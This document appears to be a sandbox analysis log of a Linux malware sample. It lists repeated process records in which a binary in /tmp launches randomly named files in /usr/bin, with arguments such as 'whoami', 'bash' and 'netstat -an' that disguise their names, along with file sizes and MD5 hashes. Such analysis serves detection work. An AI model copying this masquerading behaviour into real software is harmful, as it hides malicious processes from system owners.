                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:/usr/bin/vxnottgwjc ls 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:/usr/bin/vxnottgwjc ifconfig 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:/usr/bin/vxnottgwjc whoami 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:/usr/bin/vxnottgwjc "grep \"A\"" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:55
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:/usr/bin/wqgmxyrptd bash 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:/usr/bin/wqgmxyrptd "netstat -an" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:/usr/bin/wqgmxyrptd "cd /etc" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:/usr/bin/wqgmxyrptd who 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:/usr/bin/wqgmxyrptd top 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:01
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/wqgmxyrptd
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:1bc009a7f083db215bf84e9c47f473df

                                                                  General

                                                                  Start time:19:41:07
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:07
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:07
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:07
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:07
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:07
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:08
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/qkswzskzvm
                                                                  Arguments:/usr/bin/qkswzskzvm "echo \"find\"" 5218
                                                                  File size:548671 bytes
                                                                  MD5 hash:86e4c1ab0dfd4b3035858198ddf0637d

                                                                  General

                                                                  Start time:19:41:08
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/qkswzskzvm
                                                                  Arguments:n/a
                                                                  File size:548671 bytes
                                                                  MD5 hash:86e4c1ab0dfd4b3035858198ddf0637d

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:/usr/bin/uprkxpaulc "route -n" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:/usr/bin/uprkxpaulc "cd /etc" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:/usr/bin/uprkxpaulc whoami 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:14
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:/usr/bin/uprkxpaulc bash 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:15
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/uprkxpaulc
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:4de43037f11f701f92d366ac0f9f2e9a

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:/usr/bin/akxqlcphlm "echo \"find\"" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:/usr/bin/akxqlcphlm whoami 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:20
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:/usr/bin/akxqlcphlm id 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:/usr/bin/akxqlcphlm "ps -ef" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:21
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/akxqlcphlm
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:15005b1ff675843eff1f6e6b4e86968c

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:/usr/bin/mligukcpvp who 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:/usr/bin/mligukcpvp "ls -la" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:26
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:/usr/bin/mligukcpvp "sleep 1" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:/usr/bin/mligukcpvp "route -n" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:/usr/bin/mligukcpvp "ps -ef" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:27
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/mligukcpvp
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:aaed11dc1d18164dea6192e21f9e544e

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:/usr/bin/kexmeeeolw "sleep 1" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:/usr/bin/kexmeeeolw "ls -la" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:/usr/bin/kexmeeeolw bash 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

